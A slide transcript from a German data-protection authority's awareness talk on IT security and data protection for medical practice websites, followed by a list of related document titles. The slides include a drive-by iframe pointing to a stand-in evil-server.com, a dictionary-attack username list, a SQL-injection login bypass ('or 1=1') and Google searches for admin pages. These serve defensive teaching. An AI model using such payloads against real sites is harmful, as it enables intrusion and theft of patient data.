Hippokrates Praxen im Netz
|
|
- Melanie Morgenstern
- vor 8 Jahren
- Abrufe
Transkript
1 Hippokrates Praxen im Netz Initiative Mit Sicherheit gut behandelt. Vortrag Regionalveranstaltungen H. Eiermann
2 Agenda 1 Risiko Schadsoftware 2 Anforderungen an Praxissysteme H. Eiermann
3 Agenda 1 Risiko Schadsoftware H. Eiermann
4 Checkliste Praxisverwaltungssystem IT-Sicherheit Internet-Anbindung
5 Checkliste Praxisverwaltungssystem IT-Sicherheit
6 BSI Lagebericht IT-Sicherheit Drive-by-Exploits Größte Gefahr bei Sicherheitslücken in Anwendungssoftware (CERT-Bund: 20/Woche)
7 BSI Lagebericht IT-Sicherheit Drive-by-Exploits Größte Gefahr bei Sicherheitslücken in Anwendungssoftware (CERT-Bund: 20/Woche)
8 Drive-by-Infection server.com <html> <iframe src=evil-server.com/eval.php </body>
9 Drive-by-Infection server.com Exploit Schadcode - Fernsteuerung - Keylogger - Scanner -
10 Drive-by-Infection server.com evil-server.com <html> <iframe src=evil-server.com/eval.php </body> Evaluation Clientdaten: Betriebssystem Browsertyp / Version Konfiguration Plugins Exploit Schadcode
11 Drive-by-Infection
12 Agenda 2 Die Praxis im Netz H. Eiermann
13 Hippokrates 2.0 Praxen im Netz > 50 % der Praxen verfügen über eine Internet-Präsenz * Praxisinformationen, Schwerpunkte, Qualifikationen, Personal Serviceleistungen (Anforderung von Rezepten, Terminvereinbarung) Für > 70 % der Ärzte wichtigste Marketingmaßnahme * * ehealth-berich Der Einsatz von Telematik und Telemedizin im Gesundheitswesen * Studie "Ärzte im Zukunftsmarkt Gesundheit (2012) H. Eiermann
14 Hippokrates 2.0 Praxen im Netz Bundesdatenschutzgesetz Unterrichtung/Einwilligung Sichere Datenübertragung Telemediengesetz Impressum Verarbeitung von Nutzungsdaten Widerspruchsrecht Elektronische Einwilligung Gesicherter Zugriff H. Eiermann
15 Hippokrates 2.0 Praxen im Netz Bundesdatenschutzgesetz Unterrichtung/Einwilligung Sichere Datenübertragung Telemediengesetz Impressum Verarbeitung von Nutzungsdaten Widerspruchsrecht Elektronische Einwilligung Gesicherter Zugriff H. Eiermann
16 H. Eiermann
17 Facebook Like-Button
18
19 Facebook Like-it-Button Ohne Betätigen des Like-Buttons! Ohne Information der Nutzer. IP
20 Facebook Like-it-Button Ohne Betätigen des Like-Buttons! Ohne Information der Nutzer. IP
21 Telemediengesetz Telemediengesetz Pseudonyme Nutzungsprofile 13 Abs. 1 TMG Unterrichtung / Einwilligung 15 Abs. 3 Satz 2 TMG Widerspruch 15 Abs. 3 Satz 3 TMG Zusammenführungsverbot
22 Facebook Like-Button: 2-Klick-Lösung 2-Klick-Lösung* *
23 2-Klick-Lösung
24 Hippokrates 2.0 Praxen im Netz
25 Hippokrates 2.0 Praxen im Netz
26 Hippokrates 2.0 Praxen im Netz... für die Kennung test mit beliebigem Passwort LfD Rheinland-Pfalz H. Eiermann
27 Hippokrates 2.0 Praxen im Netz... für vorgewählte Kennungen in einer Datei mit einem beliebigem Passwort (Wörterbuchattacke) z.b. admin administrator system sa nimda service test... LfD Rheinland-Pfalz H. Eiermann
28 Hippokrates 2.0 Praxen im Netz
29 Hippokrates 2.0 Praxen im Netz
30 Hippokrates 2.0 Praxen im Netz Dahinter stehende SQL-Anweisung: select... from... where name=... and passwd=...
31 Hippokrates 2.0 Praxen im Netz Dahinter stehende SQL-Anweisung: select... from... where name=... and passwd=... Benutzereingabe führt zu: select... from... where name= 4711 or 1=1
32 Hippokrates 2.0 Praxen im Netz Anmeldung ohne gültige Benutzerkennung oder Passwort war möglich Zeitaufwand ca. 5 sec
33 Hippokrates 2.0 Praxen im Netz
34 Hippokrates 2.0 Praxen im Netz Überweisungsliste
35 Hippokrates 2.0 Praxen im Netz Verschreibungen
36 Hippokrates 2.0 Praxen im Netz Säumige Zahler
37 Hippokrates 2.0 Praxen im Netz Passwortdatei
38 Hippokrates 2.0 Praxen im Netz Login
39 ... admin.asp, admin.js, admin.html Wir finden Dich... login.asp, login.js, login.html... anmeldung.asp, anmeldung.js, anmeldung.html
40 Hackers Google
41
42 Helmut Eiermann Gruppenleiter Technik Hintere Bleiche Mainz Tel (06131) Fax (06131)
Hippokrates Praxen im Netz
Hippokrates 2.0 - Praxen im Netz Medizinrechtssymposium der Bezirksärztekammer Trier Trier, 17.2.2016 H. Eiermann > 50 % der Praxen verfügen über eine Internet-Präsenz Praxisinformationen, Schwerpunkte,
MehrHippokrates 2.0 - Anforderungen an Praxissysteme
Hippokrates 2.0 - Anforderungen an Praxissysteme Initiative Mit Sicherheit gut behandelt. Vortrag Regionalveranstaltungen H. Eiermann Agenda 1 IT in der Praxis 2 Anforderungen an Praxissysteme 3 IT Betreuung
MehrSicherheit der Verarbeitung Verantwortung für Datenspuren. Was ändert sich, was bleibt?
Sicherheit der Verarbeitung Verantwortung für Datenspuren. Was ändert sich, was bleibt? BvD Herbstkonferenz 27.10.2017, Stuttgart Folie: 1/95 Helmut Stellvertretender Datenschutzbeauftragter Rheinland-Pfalz
MehrMit Sicherheit gut behandelt.
Mit Sicherheit gut behandelt. Eine Initiative zur Verbesserung von IT-Sicherheit und Datenschutz bei Ärzten und Psychotherapeuten. www.mit-sicherheit-gut-behandelt.de IT Sicherheit und Datenschutz bei
MehrSocial Media Marketing und Datenschutz
1 2 Social Media Marketing und Datenschutz Anwendbarkeit des deutschen Datenschutzrechts - einschlägige Normen Datenschutzrechtliche Probleme beim Social Media Marketing 4 Anwendungsfälle Rechtsfolgen
MehrIT-Sicherheitsfragen in Pflegeeinrichtungen. Rechtsgrundlagen mit Blick auf die EU DSGVO
IT-Sicherheitsfragen in Pflegeeinrichtungen. Rechtsgrundlagen mit Blick auf die EU DSGVO Update 2016, Wiesbaden 15.11.16 H. Eiermann Folie 1 Agenda Sicherheit der Verarbeitung / Risiken Sicherheit der
MehrGoogle Analytics - Kostenloser Service mit Risiken? RA Dr. Jan K. Köcher Syndikus DFN-CERT Services GmbH koecher@dfn-cert.de
Google Analytics - Kostenloser Service mit Risiken? RA Dr. Jan K. Köcher Syndikus DFN-CERT Services GmbH koecher@dfn-cert.de Inhalt des Angebots Kostenlos, es sei denn mehr als 5 Mio. Page Views monatlich:
MehrDatenschutzrechtliche Hinweise zum Einsatz von Web-Analysediensten wie z.b. Google Analytics 1. - Stand: 1. Juli 2010 -
INNENMINISTERIUM AUFSICHTSBEHÖRDE FÜR DEN DATENSCHUTZ IM NICHTÖFFENTLICHEN BEREICH Datenschutzrechtliche Hinweise zum Einsatz von Web-Analysediensten wie z.b. Google Analytics 1 - Stand: 1. Juli 2010 -
MehrDatenschutz im E-Learning Sektor. Ingrid Pahlen-Brandt Behördliche Datenschutzbeauftragte an der Freien Universität Berlin GML 2009, 13.
Datenschutz im E-Learning Sektor Ingrid Pahlen-Brandt Behördliche GML 2009, 13. März 2009 Inhalte und Ziel des Vortrages -Übersicht über datenschutzrechtliche Fragestellungen - Recht- Datenschutzrechtlicher
MehrNeue Entwicklungen bei der Cookie-Richtlinie der EU
Neue Entwicklungen bei der Cookie-Richtlinie der EU RA Dr. Jan K. Köcher Syndikus, Datenschutzbeauftragter DFN-CERT Services GmbH koecher@dfn-cert.de Überblick Cookies Session- Cookies Cookies unterstützen
MehrFacebook und Datenschutz Geht das überhaupt?
Folie 1 Facebook und Datenschutz Geht das überhaupt? Dipl.-Ing. Michael Foth CISA, CGEIT CFE, CRISC Datenschutzbeauftragter des Landessportverbandes Schleswig-Holstein e. V. Folie 2 Themen Webseite Facebook
MehrIT-Sicherheit heute (Teil 4) Diesen und andere Vorträge bieten wir Ihnen als kostenlose Downloads an. www.networktraining.
IT-Sicherheit heute (Teil 4) Diesen und andere Vorträge bieten wir Ihnen als kostenlose Downloads an. www.networktraining.de/download Agenda Grundlagen: Fakten, Zahlen, Begriffe Der Weg zu mehr Sicherheit
MehrKurzanleitung InternetBanking mit elektronischer Unterschrift (HBCI) Schlüsseldatei / USB-Stick. www.olb.de
Herzlich willkommen Mit dem OLB-InternetBanking haben Sie per Mausklick rund um die Uhr Zugang zu Ihren Konten, Kreditkartenumsätzen, Geldanlagen, Depots und Kreditkonten. Die Einrichtung des OLB-InternetBanking
MehrLOG-FT BAG Filetransfer zum Austausch mit dem Bundesamt für Güterverkehr (BAG) Kurzanleitung
Filetransfer zum Austausch mit dem Bundesamt für Güterverkehr (BAG) Kurzanleitung VERSION 8.0 FEBRUAR 2013 Logics Software GmbH Schwanthalerstr. 9 80336 München Tel.: +49 (89) 55 24 04-0 Fax +49 (89) 55
Mehremetrics Summit, München 2011 Special: Datenschutz im Online-Marketing HÄRTING Rechtsanwälte Chausseestraße 13 10115 Berlin
emetrics Summit, München 2011 6. April 2011 Dr. Martin Schirmbacher Fachanwalt für IT-Recht twitter.com/mschirmbacher HÄRTING Rechtsanwälte Chausseestraße 13 10115 Berlin www.haerting.de Überblick Grundzüge
MehrBaden-Württemberg. INNENMINISTERIUM - Aufsichtsbehörde für den Datenschutz im nichtöffentlichen Bereich -
Baden-Württemberg INNENMINISTERIUM - Aufsichtsbehörde für den Datenschutz im nichtöffentlichen Bereich - Datenschutzrechtliche Hinweise zum Einsatz von Webanalysediensten wie z. B. Google Analytics 1 -
MehrGesünder mit Apps und Co? Datenschutzrechtliche Anforderungen
Gesünder mit Apps und Co? Datenschutzrechtliche Anforderungen Berlin, 11. November 2015 Fachveranstaltung der Landesvereinigung Selbsthilfe Berlin e.v. Carolyn Eichler Berliner Beauftragter für Datenschutz
MehrOptions- und Freitext-Modul Update-Anleitung
Options- und Freitext-Modul Update-Anleitung Hinweis... 2 Update für Versionen kleiner als 1.2.4 auf 1.3.x... 3 Update für Versionen ab 1.2.4 auf 1.3.x... 6 Update für Versionen ab 1.3.x auf 2.x.x... 7
MehrDas digitale Scheunentor
Folie 1 "Das digitale Scheunentor" Folie 2 "Das digitale Scheunentor" Das digitale Scheunentor Prüferfahrungen des Landesbeauftragten für den Datenschutz Rheinland-Pfalz aus der Kontrolle von Internetangeboten
Mehr1. Erhebung und Verwendung von Nutzungsdaten ( 15 TMG) beim Besuch der Homepage
Datenschutzerklärung Nachfolgende Hinweise gelten für die Nutzung des Internet Angebots und der E Mail Newsletter der Ernst Klett Verlag GmbH, Rotebühlstraße 77, 70178 Stuttgart, 0711 66 72 13 33. Klett
MehrDatenschutz und De-Mail
Datenschutz und De-Mail Sven Hermerschmidt beim Bundesbeauftragten für den Datenschutz und die Informationsfreiheit Husarenstr. 30 53117 Bonn Tel: +49 (0) 228 99 77 99 115 Fax: +49 (0) 228 99 10 77 99
MehrFrey Services Deutschland GmbH; Personalabteilung / Ausbildung und Personalentwicklung Stand: August 2013 Seite 1 von 5
HÄUFIG GESTELLTE FRAGEN Warum sollte ich mich online bewerben?... 2 Kann ich mich auch per Post bewerben?... 2 Wie viel Zeit benötige ich für eine Online-Bewerbung... 2 Welcher Browser wird unterstützt?...
MehrAnleitung mtan (SMS-Authentisierung) mit SSLVPN.TG.CH
Amt für Informatik Anleitung mtan (SMS-Authentisierung) mit SSLVPN.TG.CH Anleitung vom 12. September 2009 Version: 1.0 Ersteller: Ressort Sicherheit Zielgruppe: Benutzer von SSLVPN.TG.CH Kurzbeschreib:
MehrSchwachstellenanalyse 2012
Schwachstellenanalyse 2012 Sicherheitslücken und Schwachstellen in Onlineshops Andre C. Faßbender Schwachstellenforschung Faßbender 13.01.2012 Inhaltsverzeichnis 1. Abstract... 3 2. Konfiguration der getesteten
MehrSyMobile Installationsanleitung
Systemvoraussetzungen: - Windows XP SP3 - Windows 2003 Server - Windows Vista Professional/Business - Windows 7 - Windows 2008 Server - Windows 2008 R2 Server - SQL Server 2005/2008/2008 R2 - SelectLine
MehrX-Lite. KURZANLEITUNG ZUR KONFIGURATION VON X-LITE (WWW.COUNTERPATH.COM) Mehr Informationen unter http://www.e-fon.ch
X-Lite KURZANLEITUNG ZUR KONFIGURATION VON X-LITE (WWW.COUNTERPATH.COM) Mehr Informationen unter http://www.e-fon.ch Sicherheitshinweis: Wir bitten Sie zu beachten, dass jeder Unbefugte mit Zugriff auf
MehrProfilwechsel Sicherheitsdatei (alt) nach Sicherheitsdatei (neu)
ACHTUNG: Sollte die Umstellung entsprechend dieser Anleitung nicht erfolgreich sein und/oder treten während oder nach der Umstellung Probleme auf, setzen Sie sich bitte mit dem Hersteller des Programms
MehrHorstbox VoIP. Stefan Dahler. 1. HorstBox Konfiguration. 1.1 Einleitung
1. HorstBox Konfiguration 1.1 Einleitung Im Folgenden wird die Voice over IP Konfiguration in der HorstBox beschrieben. Sie werden einen Internet Zugang über DSL zu Ihrem Provider konfigurieren und für
MehrKurzanleitung OLB-App Mobiles OnlineBanking für Smartphones und Tablets. www.olb.de
www.olb.de Herzlich willkommen Mit der haben Sie weltweit Ihre Konten im Griff egal ob auf Ihrem Smartphone oder Tablet. Ihre Transaktionen bestätigen Sie bequem mit Ihrer elektronischen Unterschrift ganz
Mehr1 Office 365 an der HTL Wien 10: Einstellungen 2 Inhalt:
1 Office 365 an der HTL Wien 10: Einstellungen 2 Inhalt: 1 Office 365 an der HTL Wien 10: Einstellungen... 1 2 Inhalt:... 1 3 Lizenzen... 2 4 Anmeldung (kurz)... 2 5 Anmeldung, Einrichtung, (Details)...
MehrClickProfile Mobile. Leitfaden Client. Ihre Vision ist unsere Aufgabe
ClickProfile Mobile Leitfaden Client 1. Einleitung ClickProfile Mobile ist eine Zusatzanwendung für die Telefonzentrale Vannessa. Mit dieser Anwendung ist es den Benutzern von Vannessa möglich, Ihre Profile
MehrKurzanleitung OnlineBanking mit elektronischer Unterschrift (HBCI) Schlüsseldatei / USB-Stick. www.olb.de
www.olb.de Herzlich willkommen Mit dem OLB-OnlineBanking haben Sie per Mausklick rund um die Uhr Zugang zu Ihren Konten, Kreditkartenumsätzen, Geldanlagen, Depots und Kreditkonten. Die Einrichtung des
MehrWegleitung Homepage ZSHAM
Wegleitung Homepage Zur Vereinfachung der Navigierung auf der Homepage haben wir eine Wegleitung mit drei Kapitel erstellt. Kapitel 1: Anmeldung (einloggen) über Homepage Kapitel 2: Anmeldung mit offiziellem
MehrDatenschutzerklärung der emco electroroller GmbH für die emcoelektroroller.de
Datenschutzerklärung der emco electroroller GmbH für die emcoelektroroller.de Wir freuen uns über Ihr Interesse an unserer Website. Der Schutz Ihrer Privatsphäre ist für uns sehr wichtig. Nachstehend informieren
MehrBrowser Fingerprint. IP 47.11.8.15 + Browserdaten, www.server.de
Browser Fingerprint IP 47.11.8.15 + Browserdaten, www.server.de Browser Fingerprints Untersuchung der Electronic Frontier Foundation EFF Millionen von Browserzugriffen > 80 % mit individuellen Charakteristika
MehrImpressum. OTO STUDIOS UG (haftungsbeschränkt) Erich-Weinert-Str. 16. D-10439 Berlin. Tel: +49 (0) 30 29 36 42 32. Mail: hello@otostudios.
Impressum OTO STUDIOS UG (haftungsbeschränkt) Erich-Weinert-Str. 16 D-10439 Berlin Tel: +49 (0) 30 29 36 42 32 Mail: hello@otostudios.de Geschäftsführer: Christian Heiter Inhaber: Christian Heiter, Martin
MehrNachfolgend wird beispielhaft die Abfolge des Zugriffs auf Angebote von OVID, Elsevier und Springer via mylogin von zu Hause dargestellt
Zugriff auf lizenzierte Datenbanken, Zeitschriften oder E-Books der Universität Freiburg über den Authentifizierungsdienst mylogin der Universität Freiburg Nachfolgend wird beispielhaft die Abfolge des
MehrMeine ZyXEL Cloud. Tobias Hermanns 16.12.2014 V0.10
Meine ZyXEL Cloud Tobias Hermanns 16.12.2014 V0.10 Einleitung Meine ZyXEL Cloud ist die Lösung für Remote Anwendungen und sicheren Zugriff auf Ihrem ZyXEL NAS. Zugriff von überall Kostenloser DynDNS Account
MehrSicher sein, statt in Sicherheit wiegen Sicherheit bei. Web-Anwendungen. Vortrag bei Infotech 08.06.2015
Sicher sein, statt in Sicherheit wiegen Sicherheit bei Web-Anwendungen Vortrag bei Infotech 08.06.2015 2 Ist Sicherheit bei Web-Anwendungen ein Thema? 3 Zusammenfassung Verizon Data-Breach-Report 2014,
MehrFirmware-Update, CAPI Update
Produkt: Modul: Kurzbeschreibung: Teldat Bintec Router RT-Serie Firmware-Update, CAPI Update Diese Anleitung hilft Ihnen, das nachfolgend geschilderte Problem zu beheben. Dazu sollten Sie über gute bis
MehrWorkflow. Installationsanleitung
Workflow Installationsanleitung August 2013 Inhaltsverzeichnis Kapitel 1 Installation der Programme... 2 Kapitel 2 Lizenzierung Novaline Workflow... 4 Kapitel 3 Einrichten der Systeme... 5 3.1 Workflow
MehrSoziale Netzwerke. Der datenschutzkonforme Einsatz im Betrieb. Referent: Thorsten Logemann
Soziale Netzwerke Der datenschutzkonforme Einsatz im Betrieb Referent: Thorsten Logemann Datenschutz, IT-Sicherheit und Compliance: Wir halten Sie auf Kurs! intersoft consulting services AG Frankenstraße
MehrDer Einsatz von Reichweitenanalysediensten im Internet
DER LANDESBEAUFTRAGTE FÜR DEN DATENSCHUTZ Der Einsatz von Reichweitenanalysediensten im Internet Datenschutzrechtliche Hinweise am Beispiel von Google Analytics - Stand: 11.02.2014 - Seite 2 Der Landesbeauftragte
MehrDATENSCHUTZERKLÄRUNG
DATENSCHUTZERKLÄRUNG Wir freuen uns über Ihr Interesse an unserer Website. Der Schutz Ihrer Privatsphäre ist für uns sehr wichtig. Nachstehend möchten wir Sie ausführlich über den Umgang mit Ihren Daten
MehrDatenschutz im E-Commerce
Datenschutz im E-Commerce RA Christopher Beindorff Beindorff & Ipland Rechtsanwälte Rubensstr. 3-30177 Hannover Tel.: 0511 6468098 / Fax 0511-6468055...... www.beindorff-ipland.de info@beindorff-ipland.de
MehrSicherheit in Datenbank- und Informationssystemen
Sicherheit in Datenbank- und Informationssystemen Ingo Frommholz Universität Duisburg-Essen ingo.frommholz@uni-due.de Datenbank-Praktikum 12. Juli 2006 UNIVERSITÄT D U I S B U R G E S S E N Inhalt 1 Sicherheit
MehrDatenschutzhinweise. Allgemeiner Teil
Datenschutzhinweise Der VATM e.v. ist als Betreiber dieser Webseite und der darauf angebotenen Dienste verantwortlich für die Erhebung, Verarbeitung und Nutzung von personenbezogenen Daten im Sinne des
MehrDie neue G Data SmallBusiness Security: Perfekter Schutz für hohe Anforderungen. Lars Lindner, Administrator BDK in Berlin Ihre Kunden erwarten eine perfekte Absicherung ihrer IT. Der Bund Deutscher Kriminalbeamter
MehrRISIMA Consulting: Beratung, Planung, Produkte und Services für kleine und mittelständische Unternehmen. www.risima.de
RISIMA Consulting: Beratung, Planung, Produkte und Services für kleine und mittelständische Unternehmen. www.risima.de RISIKEN MINIMIEREN. SICHERHEIT MAXIMIEREN. CHANCEN OPTIMIEREN. ERHÖHEN SIE DIE SICHERHEIT
MehrAnleitung WLAN BBZ Schüler
Anleitung WLAN BBZ Schüler Wir möchten Sie darauf hinweisen, dass eine Weitergabe Ihres Kennworts an Dritte untersagt ist. Sollten Sie den Verdacht haben, dass Ihr Passwort weiteren Personen bekannt ist,
MehrAktuelle Herausforderungen im Datenschutz
Aktuelle Herausforderungen im Datenschutz Johannes Landvogt c/o Bundesbeauftragter für den Datenschutz und Informationsfreiheit BSI & SIZ Grundschutz Tag Bonn, 09. Februar 2012 1 1 Inhalt Cloud Computing
MehrElektronische Betriebsprüfung mit IDEA
Elektronische Betriebsprüfung mit IDEA Ein Vortrag der Referenten: Thomas Bücher, Steuerberater Stefan Janoschek, Geschäftsführer Seite 1 Rechtliche Grundlagen 147 Abs. 6 AO Grundsätze zum Datenzugriff
MehrEine Million Kundendaten gestohlen - Aktuelle Fälle von Datendiebstahl und wie sie grundsätzlich funktionieren
Eine Million Kundendaten gestohlen - Aktuelle Fälle von Datendiebstahl und wie sie grundsätzlich funktionieren patrick.hof@redteam-pentesting.de http://www.redteam-pentesting.de netzwerk recherche 01./02.
MehrWo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp.
Erfahrungen mit dem Insight Manager von HP Dipl. Ing. Elektrotechnik (FH) - Automatisierungs- / Regelungstechnik DV-Spezialist Landesbank Rheinland-Pfalz Abteilung 2-351 Große Bleiche 54-56 55098 Mainz
MehrHier finden Sie häufig gestellte Fragen und die Antworten darauf.
Hier finden Sie häufig gestellte Fragen und die Antworten darauf. Inhalt 1. Die Signaturen auf den PDF-Dokumenten des Landesbetrieb Staßenwesen Brandenburg werden als ungültig ausgewiesen oder mit Gültigkeit
MehrSOCIAL MEDIA & RECHT DER LIKE-BUTTON EIN PROBLEM FÜR DIE VERWALTUNG?
DER LIKE-BUTTON EIN PROBLEM FÜR DIE VERWALTUNG? Dr. Martin Schirmbacher Berlin, 22. November 2012 im Rahmen der Kompetenzgruppe E-Commerce des eco-verbandes Gliederung 2 ÜBERBLICK in fremden Händen Datenschutz:
MehrDiese Website und das Leistungsangebot von www.pflegemit-herz.de werden von der. Anke Reincke - Häusliche Krankenpflege und Seniorenbetreuung
Datenschutzbestimmung 1. Verantwortliche Stelle Diese Website und das Leistungsangebot von www.pflegemit-herz.de werden von der Anke Reincke - Häusliche Krankenpflege und Seniorenbetreuung Pieskower Straße
MehrAnleitung Redmine. Inhalt. Seite 1 von 11. Anleitung Redmine
Seite 1 von 11 Anleitung Inhalt Inhalt... 1 1. Installation... 2 2. Setup... 2 2.1 Login... 2 2.2 Benutzer erstellen... 2 2.3 Projekt erstellen... 4 2.4 SVN/Git Integration... 6 2.4.1 Konfiguration für
Mehrwesentliche Rechtsgrundlage für Webseiten, Newsletter, Foren etc.: insbesondere: Informationspflichten ( 5,6) und Datenschutz ( 11 ff.
Vereine im Internet - Homepage, Facebook, Twitter & Co. Dr. Frank Weller Rechtsanwalt und Mediator Internetrecht wesentliche Rechtsgrundlage für Betreiber (Diensteanbieter) von Webseiten, Newsletter, Foren
MehrHerausforderungen und Anforderungen für ein organisationsweites Notfall-Passwortmanagement. Felix von Eye, Wolfgang Hommel und Helmut Reiser 1
Herausforderungen und Anforderungen für ein organisationsweites Notfall-Passwortmanagement Felix von Eye, Wolfgang Hommel und Helmut Reiser 1 Stichpunkte zum Thema Passwortmanagement: Verwaltung von Passwörtern
MehrDATENSCHUTZERKLÄRUNG steuerberaten.de Steuerberatungsgesellschaft mbh
DATENSCHUTZERKLÄRUNG steuerberaten.de Steuerberatungsgesellschaft mbh 1 Allgemeines Diese Datenschutzerklärung bezieht sich nur auf unsere Webseiten unter der Domain www.steuerberaten.de mit Ausnahme des
MehrVerwalten Sie Ihre Homepage von überall zu jeder Zeit! Angebote und Informationen auf www.simpleweb.ch.
Verwalten Sie Ihre Homepage von überall zu jeder Zeit! Angebote und Informationen auf www.simpleweb.ch. simpleweb.ch CMS Das simpleweb.ch CMS ist ein Verwaltungssoftware für Ihre Homepage. Der Begriff
MehrAblaufbeschreibung Einrichtung EBICS in ProfiCash
1.) Zunächst müssen Sie in der BPD-Verwaltung eine Kennung für EBICS anlegen. Änderungen an der BPD können nur vom Anwender Master durchgeführt werden. 2. Hier werden die entsprechenden Parameter eingegeben.
MehrWebseiten im PHYSnet. PHYSnet-RZ 9. Mai 2011
Webseiten im PHYSnet PHYSnet-RZ 9. Mai 2011 1 1 Umzug auf das AFS Die www-dateien sind vom Alpha-CLuster auf das AFS umgezogen. Anleitungen zum Zugriff auf das AFS finden Sie unter http://www.physnet.uni-hamburg.de/physnet/doku.htm.
MehrEinbindung des Web Map Service für Gemeinden Anleitung
Einbindung des Web Map Service für Gemeinden Anleitung Datum: 15.10.2015 Inhaltsverzeichnis 1 Allgemein... 3 2 Einstiegsseite Erhalt eines gültigen WMS-Zugriffs... 3 3 Einbindung der Dienste... 6 3.1 WMS-fähiges
MehrDatenschutzerklärung. Bürgschaftsbank Hessen: Datenschutz. http://www.bb-h.de/datenschutz/
Seite 1 von 5 Datenschutzerklärung Geltungsbereich Diese Datenschutzerklärung klärt Nutzer über die Art, den Umfang und Zwecke der Erhebung und Verwendung personenbezogener Daten durch den verantwortlichen
MehrDatenschutz im Telemonitoring:
Datenschutz im Telemonitoring: Erfahrungen aus dem Projekt Partnership for the Heart Martin Braecklein, Robert Bosch GmbH, Stuttgart Dr. Stephanie Lücke, Charité - Universitätsmedizin Berlin Konsortialpartner:
MehrVeranstaltungsänderungs-App der Hochschule Kempten
Veranstaltungsänderungs-App der Hochschule Kempten Veranstaltungsänderungs-App der Hochschule Kempten Funktionsbeschreibung Beschreibung der App allgemein 3 Die ersten Schritte nach dem ersten Start der
Mehr_PROXESS Update. ο Service Zone 6 (gem. Anlage) 1.332,00 Alle Preise zuzüglich MwSt. Angebot zum Release-Update PROXESS 3.
Angebot zum Release-Update PROXESS 3.0 auf 2008: Bei einer Beauftragung der zur Durchführung des Updates von PROXESS 3.0 auf PROXESS 2008 bis zum 30.09.08 besteht für PROXESS Kunden mit gültigem Softwarepflegevertrag
MehrFolgende Voraussetzungen für die Konfiguration müssen erfüllt sein:
7. Intrusion Prevention System 7.1 Einleitung Sie konfigurieren das Intrusion Prevention System um das Netzwerk vor Angriffen zu schützen. Grundsätzlich soll nicht jeder TFTP Datenverkehr blockiert werden,
MehrMatrix42. Use Case - Sicherung und Rücksicherung persönlicher Einstellungen über Personal Backup. Version 1.0.0. 23. September 2015 - 1 -
Matrix42 Use Case - Sicherung und Rücksicherung persönlicher Version 1.0.0 23. September 2015-1 - Inhaltsverzeichnis 1 Einleitung 3 1.1 Beschreibung 3 1.2 Vorbereitung 3 1.3 Ziel 3 2 Use Case 4-2 - 1 Einleitung
MehrDOK. ART GD1. Citrix Portal
Status Vorname Name Funktion Erstellt: Datum DD-MMM-YYYY Unterschrift Handwritten signature or electronic signature (time (CET) and name) 1 Zweck Dieses Dokument beschreibt wie das auf einem beliebigem
MehrWebseiten mit fragwürdigen Aufrufen von "spy & track" - Unternehmen
Webseiten mit fragwürdigen Aufrufen von "spy & track" - Unternehmen Die vorliegende Dokumentation umfasst eine kleine Auswahl von Webseiten, bei denen automatisch (ohne Benutzer vorab zu informieren oder
MehrLegen Sie nun dieses Verzeichnis mit dem Namen "joomla" hier an: C:xampphtdocs.
Installationsanleitung von Joomla unter XAMPP Wer das Content-Management-System Joomla installieren will, braucht hierzu einen Webserver, der mit der Programmiersprache PHP und dem Datenbankprogramm MySQL
MehrMOUNT10 StoragePlatform Console
MOUNT10 StoragePlatform Console V7.14 Kurzmanual für Microsoft Windows Ihr Leitfaden für die Verwaltung der MOUNT10 Backup-Umgebung unter Verwendung der Storage Platform Console Inhaltsverzeichnis 1 VERWENDUNGSZWECK...3
MehrDatenschutz und Datensicherung (BDSG) Inhaltsübersicht
Datenschutz und Datensicherung (BDSG) Inhaltsübersicht Datenschutzziel Datenschutz und Datensicherung Personenbezogene Daten Datenverarbeitung Zulässigkeit personenbezogener Datenverarbeitung Zulässigkeit
Mehr.htaccess HOWTO. zum Schutz von Dateien und Verzeichnissen mittels Passwortabfrage
.htaccess HOWTO zum Schutz von Dateien und Verzeichnissen mittels Passwortabfrage Stand: 21.06.2015 Inhaltsverzeichnis 1. Vorwort...3 2. Verwendung...4 2.1 Allgemeines...4 2.1 Das Aussehen der.htaccess
MehrHow-to: Webserver NAT. Securepoint Security System Version 2007nx
Securepoint Security System Inhaltsverzeichnis Webserver NAT... 3 1 Konfiguration einer Webserver NAT... 4 1.1 Einrichten von Netzwerkobjekten... 4 1.2 Erstellen von Firewall-Regeln... 6 Seite 2 Webserver
MehrBSI Technische Richtlinie
Seite 1 von 8 BSI Technische Richtlinie BSI Bezeichnung: Technische Richtlinie De-Mail Bezeichnung: Anwendungsbereich: Kürzel: De-Mail Dokumentenablage IT-Sicherheit BSI TR 01201 Anwendungsbereich: Version:
MehrZur Bestätigung wird je nach Anmeldung (Benutzer oder Administrator) eine Meldung angezeigt:
K U R Z A N L E I T U N G D A S R Z L WE B - P O R T A L D E R R Z L N E W S L E T T E R ( I N F O - M A I L ) RZL Software GmbH Riedauer Straße 15 4910 Ried im Innkreis Version: 11. Juni 2012 / mw Bitte
MehrSurfen, aber sicher! Basisschutz leicht gemacht. 10 Tipps für ein ungetrübtes und nachhaltiges Surf-Vergnügen. www.bsi-fuer-buerger.
Surfen, aber sicher! Basisschutz leicht gemacht 10 Tipps für ein ungetrübtes und nachhaltiges Surf-Vergnügen www.bsi-fuer-buerger.de Ins Internet mit Sicherheit! Im Internet surfen ist wie Autofahren reinsetzen
MehrDie Situation: aus FRONTER heraus mit Externen kooperieren. Die Voraussetzungen:
Quickstart.NRWir - Ein leicht verständliches Tutorial für Fronter Y11. Ihr schneller Helfer bei Alltagsfragen rund um die Lernplattform NRWir-Fronter. Sie finden unter www.nrwir.de/quickstarts weitere
MehrDatenschutz. Datenschutz im Webshop: Richtiger Datenschutz schafft Vertrauen Vertrauen fördert Umsatz
Datenschutz Datenschutz im Webshop: Richtiger Datenschutz schafft Vertrauen Vertrauen fördert Umsatz Datenschutz im Webshop: Richtiger Datenschutz schafft Vertrauen Vertrauen fördert Umsatz Nach Meinungsumfragen
MehrINTERNETBANKING: Oldenburgische Landesbank AG
Diese Anleitung bezieht sich ausschließlich auf die Nutzung des neuen InternetBanking Online- Programms FinanceBrowser 3 (incl. Möglichkeiten für SEPA und Xetra) der Oldenburgischen Landesbank AG unter
MehrInstallationshinweise und Systemvoraussetzungen
Installationshinweise und I. Angaben zu den Klett-Langenscheidt Moodle Kursdateien Typ: Kurs Format: Moodle 2 Erstellt mit Moodle Version: 2.0.7 Die Kursdateien wurden mit Moodle 2.0.7 erstellt. Wenn Sie
MehrKurzinformation Zugang zur NOVA für dezentrale Administratoren
Kurzinformation Zugang zur NOVA für dezentrale Administratoren Unter dieser URL können Sie sich mit Ihrem Benutzernamen und PW anmelden: www.login.eservice-drv.de/elogin Nach erfolgreicher Anmeldung mit
